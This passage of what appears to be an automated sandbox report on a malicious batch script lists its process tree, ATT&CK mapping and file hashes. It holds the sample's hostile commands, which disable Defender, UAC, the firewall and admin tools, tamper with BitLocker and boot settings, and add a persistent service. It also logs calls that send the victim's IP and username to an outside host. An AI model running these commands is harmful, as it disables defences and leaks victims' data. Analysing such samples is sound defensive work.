      command line: reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

    C:\Windows\system32\reg.exe
      command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
      - Disables RegEdit via registry modification

    C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4

        C:\Windows\system32\ipconfig.exe
          command line: ipconfig
          - Gathers network information

        C:\Windows\system32\findstr.exe
          command line: findstr IPv4

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.88

    C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c whoami

        C:\Windows\system32\whoami.exe
          command line: whoami
          - Suspicious use of AdjustPrivilegeToken

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=adminjk123

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=oailvcny\admin

    C:\Windows\system32\cmd.exe
      command line: C:\Windows\system32\cmd.exe /c net user "Admin"

        C:\Windows\system32\net.exe
          command line: net user "Admin"

            C:\Windows\system32\net1.exe
              command line: C:\Windows\system32\net1 user "Admin"

    C:\Windows\system32\takeown.exe
      command line: takeown /f "C:\Windows\System32\notepad.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe
      command line: icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\manage-bde.exe
      command line: manage-bde -off C:

    C:\Windows\system32\manage-bde.exe
      command line: manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"

    C:\Windows\system32\bcdedit.exe
      command line: bcdedit /set {default} recoveryenabled yes
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\bcdedit.exe
      command line: bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      - Modifies boot configuration data using bcdedit

    C:\Windows\system32\sc.exe
      command line: sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\archive.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
      - Launches sc.exe

    C:\Windows\system32\net.exe
      command line: net start MiServicio

        C:\Windows\system32\net1.exe
          command line: C:\Windows\system32\net1 start MiServicio

    C:\Windows\system32\takeown.exe
      command line: takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\icacls.exe
      command line: icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
      - Possible privilege escalation attempt
      - Modifies file permissions

    C:\Windows\system32\shutdown.exe
      command line: shutdown /r /t 0
      - Suspicious use of AdjustPrivilegeToken

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5756 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=4984 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4604 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4848 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5312 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=4472 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\AUDIODG.EXE
  command line: C:\Windows\system32\AUDIODG.EXE 0x410 0x2f8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6100 --field-trial-handle=1928,i,13242902252791919845,10377620236057253993,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
  - Enumerates system info in registry
  - Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2664 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3028 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3044 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4788 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4972 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5280 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=5332 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5464 --field-trial-handle=2684,i,9671187347306013573,577367865923969244,262144 --variations-seed-version /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Enumerates system info in registry
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2b4,0x7ff9e2402e98,0x7ff9e2402ea4,0x7ff9e2402eb03⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2216 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2276 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:33⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2476 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2224,i,2218617121185799118,1551353970729491288,262144 --variations-seed-version /prefetch:83⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\archive.bat1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\net.exenet session2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Windows\TEMP\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig | findstr IPv42⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\findstr.exefindstr IPv43⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c whoami2⤵
-
C:\Windows\system32\whoami.exewhoami3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user "OAILVCNY$"2⤵
-
C:\Windows\system32\net.exenet user "OAILVCNY$"3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\notepad.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\manage-bde.exemanage-bde -off C:2⤵
-
C:\Windows\system32\manage-bde.exemanage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled yes2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\sc.exesc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\archive.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"2⤵
- Launches sc.exe
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\net.exenet start MiServicio2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start MiServicio3⤵
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38c0855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
- System Services 1
  - Service Execution 1
- Command and Scripting Interpreter 1
Privilege Escalation
- Abuse Elevation Control Mechanism 1
  - Bypass User Account Control 1
- Create or Modify System Process 2
  - Windows Service 2
Defense Evasion
- Abuse Elevation Control Mechanism 1
  - Bypass User Account Control 1
- Impair Defenses 2
  - Disable or Modify Tools 1
  - Disable or Modify System Firewall 1
- Modify Registry 1
- File and Directory Permissions Modification 1
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pmaFilesize
16KB
MD5cfab81b800edabacbf6cb61aa78d5258
SHA12730d4da1be7238d701dc84eb708a064b8d1cf27
SHA256452a5479b9a2e03612576c30d30e6f51f51274cd30ef576ea1e71d20c657376f
SHA512ec188b0ee4d3daabc26799b34ee471bee988bdd7ceb011ed7df3d4cf26f98932bbbb4b70dc2b7fd4df9a3981b3ce22f4b5be4a0db97514d526e521575efb2ec6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD557a59862764f93e0db15d19588a1bf0d
SHA16395b5c04714684dd3c9fe91ef320f8c96589408
SHA256e2ba074fa03fe36fe67aada9ec089dbe57eb75ad5bbc2cf0c1acf1784cb2d325
SHA5122e3fe9df098519ad6e84f2ac469521ff75713dad6dc2372f2a47c86a9c70ecb5feeb79e3d90981d9b9bcf39fd9d77916f1b56714b800d4679804236aa88a7ede
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
280B
MD58a943235347945a47cc7bf6d526efba2
SHA104bed2470ca6c2bbb3b94c5e3d0fff1978d4986e
SHA2569ae2eb965708c552df31174a6dd47196986bf5dab29af6889fecf1c0c68f386b
SHA512934679f97318acc5c950911412369325ab72c7c7c69a1c2232da6f3edefce53dd1023ab15ccc7f1fc1e6f5271adb0fceb31752f8ddb78dd2b95e625a79744c3c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\185df0c1-5ef5-4866-b561-59f00fc7a5d8.tmpFilesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0Filesize
44KB
MD51a530e201f79e7bf348c1d9f370c931d
SHA15b216882d1eeebc9c3d722f85480c8101f6ad3ec
SHA25639752d0b46201f8cd056378e0dea67e6a8813640fcff039b84c7b6774c10ea73
SHA512cef6f4e6216cd775e5c5facb09d3bdb6e94af8b3b017c9cb5cb766c83ac7c3fff39c537b9de1ea1277c11b50e9c8168d7fcc893b8123fa25df3952f3f370ecc3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1Filesize
264KB
MD572ae60acaf59c703c0afe4d6eae55d30
SHA1540f7daf6458f50b929d7f59a5d161ee0ec03546
SHA25660530e55674a9f511784842ba8921695a3b160a496ed8b3228ab1be1c3039815
SHA512161762f0457444159b8de401b92f2ae8c5d9c24c6de593ec9ee459427b7e41fc622d8cdcf22f5a793207977ef0fa517b897411bbf615ae4d833daa2685f62a18
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2Filesize
1.0MB
MD522f65f839d7de81242f284a8c4249e7a
SHA116abd12a7774c3dd7aace0b313b342a22430a0a5
SHA2569be86473773849097a21318a2a8a1533d1fb005afec7cafb01ef9607e86fc87e
